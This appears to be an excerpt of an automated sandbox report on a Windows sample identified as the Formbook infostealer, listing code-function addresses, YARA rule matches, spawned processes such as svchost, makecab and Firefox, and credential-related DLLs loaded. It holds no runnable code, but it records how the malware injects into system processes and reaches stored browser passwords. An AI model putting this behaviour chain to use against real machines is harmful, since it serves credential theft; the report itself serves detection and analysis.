            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E40535
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E3EA80
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EF6BD7
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EFAB40
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E6E8F0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E268B8
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E4A840
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E42840
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02F0A9A6
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E56962
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EFEEDB
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E52E90
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EFCE93
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E40E59
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EFEE26
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E32FC8
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EBEFA0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EB4F40
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E82F28
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E60F30
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EE2F30
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E30CF2
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EE0CB5
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E40C00
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E3ADE0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E58DBF
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E4AD00
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EDCD1F
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EE12ED
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E5D2F0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E452A0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E8739A
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E2D34C
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EF132D
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EF70E9
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EFF0E0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EEF0CC
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E470C0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E4B1B0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E7516C
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E2F172
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02F0B16B
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EF16CC
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EFF7B0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E31460
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EFF43F
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EDD5B0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EF7571
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EEDAC6
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EDDAAC
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E85AA0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EE1AA3
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EB3A6C
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EFFA49
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EF7A46
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EB5BF0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E7DBF9
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E5FB80
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EFFB76
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E438E0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EAD800
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E49950
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E5B950
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02ED5910
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E49EB0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EFFFB1
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E41F92
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EFFF09
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EFFCF2
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EB9C32
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E5FDC0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EF7D73
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02E43D40
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_02EF1D5A
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04731460
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047F2446
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047FF43F
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047EE4F6
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047F7571
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04800591
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04740535
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047DD5B0
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_0475C6E0
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047F16CC
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04740770
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04764750
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_0473C7C0
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047FF7B0
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047F70E9
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047FF0E0
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047EF0CC
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047470C0
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_0472F172
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_0477516C
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_048001AA
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047DA118
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_04730100
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047F81CC
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_0474B1B0
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_0480B16B
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047E0274
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_0475D2F0
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047E12ED
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_0475B2C0
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047452A0
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047FA352
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_0472D34C
            Source: C:\Windows\SysWOW64\makecab.exe  Code function: 6_2_047F132D
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_048003E66_2_048003E6
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0474E3F06_2_0474E3F0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0478739A6_2_0478739A
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047B9C326_2_047B9C32
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04740C006_2_04740C00
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04730CF26_2_04730CF2
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FFCF26_2_047FFCF2
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047E0CB56_2_047E0CB5
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047F7D736_2_047F7D73
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047F1D5A6_2_047F1D5A
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04743D406_2_04743D40
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0474AD006_2_0474AD00
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0473ADE06_2_0473ADE0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0475FDC06_2_0475FDC0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04758DBF6_2_04758DBF
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04740E596_2_04740E59
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FEE266_2_047FEE26
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FEEDB6_2_047FEEDB
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04749EB06_2_04749EB0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04752E906_2_04752E90
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FCE936_2_047FCE93
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047B4F406_2_047B4F40
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04760F306_2_04760F30
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04782F286_2_04782F28
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FFF096_2_047FFF09
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04732FC86_2_04732FC8
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FFFB16_2_047FFFB1
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04741F926_2_04741F92
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047428406_2_04742840
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0474A8406_2_0474A840
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0476E8F06_2_0476E8F0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047438E06_2_047438E0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047268B86_2_047268B8
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047569626_2_04756962
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047499506_2_04749950
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0475B9506_2_0475B950
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0480A9A66_2_0480A9A6
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047429A06_2_047429A0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047B3A6C6_2_047B3A6C
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FFA496_2_047FFA49
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047F7A466_2_047F7A46
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047EDAC66_2_047EDAC6
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047DDAAC6_2_047DDAAC
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04785AA06_2_04785AA0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0473EA806_2_0473EA80
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FFB766_2_047FFB76
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047FAB406_2_047FAB40
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0477DBF96_2_0477DBF9
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047F6BD76_2_047F6BD7
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0475FB806_2_0475FB80
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02811C506_2_02811C50
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_028152F06_2_028152F0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_028134E06_2_028134E0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0280CBB76_2_0280CBB7
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0280CBC06_2_0280CBC0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0282B8006_2_0282B800
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0280AE606_2_0280AE60
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0280CDE06_2_0280CDE0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_045DE4C46_2_045DE4C4
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_045DE3A86_2_045DE3A8
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_045DE85C6_2_045DE85C
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_045DD8C86_2_045DD8C8
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_045DCB686_2_045DCB68
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 7_2_0565C5437_2_0565C543
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 7_2_0563D9037_2_0563D903
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 7_2_056429937_2_05642993
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 7_2_056460337_2_05646033
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 7_2_0563D8FA7_2_0563D8FA
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 7_2_0563DB237_2_0563DB23
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 7_2_0563BBA37_2_0563BBA3
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeCode function: 7_2_056442237_2_05644223
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_000002469BF708C88_2_000002469BF708C8
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_000002469BF714C48_2_000002469BF714C4
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_000002469BF7185C8_2_000002469BF7185C
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_000002469BF713A88_2_000002469BF713A8
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_000002469BF6FB688_2_000002469BF6FB68
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02E75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02E2B970 appears 257 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02EAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02E87E54 appears 99 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02EBF290 appears 103 times
            Source: C:\Windows\SysWOW64\makecab.exe | Code function: String function: 0472B970 appears 248 times
            Source: C:\Windows\SysWOW64\makecab.exe | Code function: String function: 047AEA12 appears 84 times
            Source: C:\Windows\SysWOW64\makecab.exe | Code function: String function: 04775130 appears 36 times
            Source: C:\Windows\SysWOW64\makecab.exe | Code function: String function: 04787E54 appears 85 times
            Source: C:\Windows\SysWOW64\makecab.exe | Code function: String function: 047BF290 appears 103 times
            Source: 8mmZ7Bkoj1.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.2410000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.2410000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3563473884.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2162734748.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3560663904.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3561586168.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3561735545.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@10/5
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | File created: C:\Users\user\AppData\Local\Temp\emboweling
            Source: 8mmZ7Bkoj1.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: makecab.exe, 00000006.00000003.2337229240.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.3560929755.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.2336582609.0000000002B21000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 8mmZ7Bkoj1.exe | ReversingLabs: Detection: 47%
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | File read: C:\Users\user\Desktop\8mmZ7Bkoj1.exe
            Source: unknown | Process created: C:\Users\user\Desktop\8mmZ7Bkoj1.exe "C:\Users\user\Desktop\8mmZ7Bkoj1.exe"
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8mmZ7Bkoj1.exe"
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | Process created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\SysWOW64\makecab.exe"
            Source: C:\Windows\SysWOW64\makecab.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: cabinet.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
